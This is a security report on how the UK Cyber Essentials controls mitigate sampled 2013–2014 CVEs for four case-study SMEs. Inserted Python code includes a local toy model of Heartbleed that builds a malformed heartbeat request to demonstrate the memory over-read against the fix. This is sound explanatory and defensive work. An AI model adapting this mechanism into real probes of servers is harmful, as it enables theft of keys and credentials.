The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included the number of workstations at the SME (to gauge its size), the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster [9], and another publicly to closed groups of security-interested SME representatives.
Vulnerabilities
A total of 200 random vulnerabilities have been taken in equal numbers from the two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre.² Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.
In this report we use the Mitre.org definition of a vulnerability, which states:

  An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page [6] in March '15.)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3: Methodology for Assessing Cyber Essentials
To warrant a CVE entry in the Mitre list, an individual vulnerability must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities were also taken, in addition to the randomly chosen 200, and assessed to establish to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with their respective potential to harm operations.
Mitigation Assessment
The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use, or likely in use (based on the SME's practice), are deemed applicable to the network.
Analysis

The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user-access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in the software and hardware used by each SME network configuration is included.

The full table of the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials security tools, 61 vulnerabilities were partially mitigated, and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated
Partially mitigated. 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Whatever level of security tooling is deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly, with the release of patches, to security flaws as they become apparent. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether more suitable and potentially more secure solutions are available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web-browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the web development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against the vulnerabilities.

Not mitigated (secure configuration). Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices, fundamentally flawed from a cyber-security standpoint, no level of security tooling on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.
Case Studies
Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance-specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical infrastructure. The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com 1000BASE-T switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services. At the head office site a Windows file server (Samba) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules are in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User access. Employees are permitted to access the internet from both their individual workstations and additional devices such as smartphones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a domain controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems. Locally, everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it is in the firing line for a large number of browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, the SME ends up with several different browsers, with several versions of each, to cover all its requirements, exposing it multiple times over to browser-based vectors.

Additionally, the heavy use of SSL-based communication places it in a position where any SSL vulnerabilities affect it too.
SME Network Two - Specialist Group
Physical infrastructure. The second SME participant employs 20-25 people based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators, via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch/access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services (email, files and database, as well as management tools) are provided by cloud servers via HTTPS; these are used daily.

User access. Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest potential vulnerabilities overall, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in the local network, responsibility is handed to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical infrastructure. SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch/access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.

All services (email, files and database, as well as management tools) are provided by cloud servers via HTTPS; these are used daily.
User access. Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud-service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.
Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers on various versions, to test and build a customer's website, means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place: when working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services
Figure 11: SME-4 Network

Physical infrastructure. This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access-point names, filtering traffic into a separate VLAN internal to the router.

Services. No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed over SSL-secured connections (mainly HTTPS).

User access. User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems. The company uses iOS for its mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing security measures. Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do, however, have automatic patch installation configured and have the Kaspersky antivirus suite installed.
Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.
Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, which enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials, then the services they use have not either, leaving them open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical infrastructure. The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services. Local: file, email, database and domain servers are the most common local service providers, all present in more than a third of SMEs. Remote: email, web hosting and file-sharing are the most common services provided remotely.

User access. More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these, it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing security measures. Of the survey respondents, most SMEs have a firewall, a password policy and a data-loss-prevention scheme in place. These are the most common security measures for the SMEs contacted; below these come access control, malware protection and, finally, patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.
Survey Respondents Network
The network built from survey-respondent data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, email and file servers have been represented, with domain-controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13: Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information is likely to strongly consider using local file servers.

The specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The web development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The hotel services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little to no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in 2014 and early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
"ShellShock"

Also known by the name "BashDoor", ShellShock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

  GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]
The exploit allowed attackers to directly execute arbitrary shell commands on a target system by controlling the contents of environment variables. However, the bug was not enough by itself to compromise a system: it needed another service, such as a CGI script behind a web server or sshd's ForceCommand, to pass attacker-supplied data into Bash's environment. While the exploit is only effective if the Bash environment can be influenced in this way, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services (mail servers, for example), as they would potentially have no idea that they had been compromised.
"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]
As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.
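A toy model of the faulty heartbeat handling, added here as an illustration and not code from the report or from OpenSSL: the vulnerable path trusts the length field inside the request, while the fixed path applies the bounds check that 1.0.1g introduced. The heartbeat messages and the "neighbouring memory" bytes are constructed for the example.

```python
import struct

# TLS heartbeat message body (RFC 6520): type (1 byte) | payload_length (2 bytes)
# | payload | padding (at least 16 bytes). Constants below are from that layout.
HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16

# Constructed stand-in for whatever happened to follow the record in process memory.
NEIGHBOURING_MEMORY = (
    b"...-----BEGIN PRIVATE KEY-----CONSTRUCTED-SECRET-----END PRIVATE KEY-----"
)


def build_heartbeat(payload: bytes, claimed_length: int) -> bytes:
    """Encode a heartbeat request. The length field is passed separately so that
    both an honest request (claimed_length == len(payload)) and a malformed one
    (claimed_length larger than the bytes actually sent) can be built."""
    return struct.pack("!BH", HB_REQUEST, claimed_length) + payload + b"\x00" * PADDING


def vulnerable_response(record: bytes, neighbouring_memory: bytes) -> bytes:
    """Pre-1.0.1g behaviour: copy payload_length bytes starting at the payload
    without checking that that many bytes were received. The copy therefore runs
    past the record into neighbouring memory (simulated here by concatenation)."""
    _, payload_length = struct.unpack("!BH", record[:3])
    memory = record[3:] + neighbouring_memory
    echoed = memory[:payload_length]
    return struct.pack("!BH", HB_RESPONSE, payload_length) + echoed + b"\x00" * PADDING


def fixed_response(record: bytes, neighbouring_memory: bytes):
    """1.0.1g behaviour: silently discard the request when the claimed payload
    length (plus header and minimum padding) exceeds the bytes actually received.
    neighbouring_memory is accepted only to keep the two signatures identical."""
    if len(record) < 1 + 2 + PADDING:          # too short even for an empty payload
        return None
    _, payload_length = struct.unpack("!BH", record[:3])
    if 1 + 2 + payload_length + PADDING > len(record):
        return None                              # the bounds check that was missing
    echoed = record[3:3 + payload_length]
    return struct.pack("!BH", HB_RESPONSE, payload_length) + echoed + b"\x00" * PADDING


def leaked_bytes(response: bytes, sent_payload: bytes) -> bytes:
    """Everything the response echoed back beyond the payload the client sent,
    i.e. the over-read. Empty for a correctly bounded implementation."""
    _, payload_length = struct.unpack("!BH", response[:3])
    return response[3:3 + payload_length][len(sent_payload):]


if __name__ == "__main__":
    honest = build_heartbeat(b"hello", 5)
    malformed = build_heartbeat(b"hello", 64)   # claims 64 bytes, sends 5
    print("honest, vulnerable :", vulnerable_response(honest, NEIGHBOURING_MEMORY)[3:8])
    print("malformed, vulnerable leaks:", leaked_bytes(vulnerable_response(malformed, NEIGHBOURING_MEMORY), b"hello"))
    print("malformed, fixed   :", fixed_response(malformed, NEIGHBOURING_MEMORY))
```

The point for a defender is that the over-read leaves no trace in the application's own data; only the length check, or a patched library, prevents it.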
Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unpatched servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
"Superfish"

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]
This vulnerability is particularly interesting, as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and it hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own certificates with the same root certificate, whose private key can be easily gathered from any other machine running SuperFish, and thereby gain full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and the issue is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL encrypted communications. A break in the chain-of-trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should apply a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use among SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is however important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
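Added example (not part of the report): a small Python parser for the layout of the "Cyber Controls Applicability" appendix, which reproduces the kind of per-control statistics quoted above over five rows copied from that table. The column names and the normalisation of control families (dropping the parenthetical refinement) are assumptions of the example.

```python
import re
from collections import Counter

# Rows copied from the report's appendix table, in the layout
# CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | controls.
APPENDIX_ROWS = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
"""

# Assumed column names for the five applicability flags.
NETWORK_COLUMNS = ("SME1", "SME2", "SME3", "SME4", "Idealised")


def parse_rows(text):
    """Parse pipe-separated appendix rows into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 9 or not cells[0].startswith("CVE-"):
            continue
        # Controls are separated by "," or "&"; the parenthetical names a refinement
        # of the control family, so "Secure Configuration (User Policy)" counts as
        # "Secure Configuration". (A "&" inside parentheses would need extra handling.)
        controls = [re.sub(r"\s*\(.*\)", "", c).strip()
                    for c in re.split(r"[,&]", cells[8]) if c.strip()]
        rows.append({
            "cve": cells[0],
            "applies": dict(zip(NETWORK_COLUMNS, (c == "y" for c in cells[1:6]))),
            "no_ce": cells[6],
            "with_ce": cells[7],
            "controls": controls,
        })
    return rows


def control_share(rows):
    """Fraction of listed CVEs in whose mitigation each control family takes part
    (the statistic behind the report's 87.5% figure for Patch Management)."""
    counts = Counter(c for r in rows for c in set(r["controls"]))
    return {c: n / len(rows) for c, n in counts.items()}


def still_open_with_ce(rows):
    """CVEs that stay 'Not Mitigated' even with Cyber Essentials in place:
    the 'don't install' cases the Conclusions call out."""
    return [r["cve"] for r in rows if r["with_ce"] == "Not Mitigated"]


def exposure(rows, network):
    """For one network column, count its applicable CVEs by With-CE outcome."""
    outcome = Counter()
    for r in rows:
        if r["applies"][network]:
            outcome[r["with_ce"]] += 1
    return dict(outcome)


if __name__ == "__main__":
    rows = parse_rows(APPENDIX_ROWS)
    for control, share in sorted(control_share(rows).items(), key=lambda kv: -kv[1]):
        print(f"{control:<22} {share:.0%}")
    print("still open with CE:", still_open_with_ce(rows))
    print("SME1 exposure:", exposure(rows, "SME1"))
```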
Recommendations
To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Controls
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management
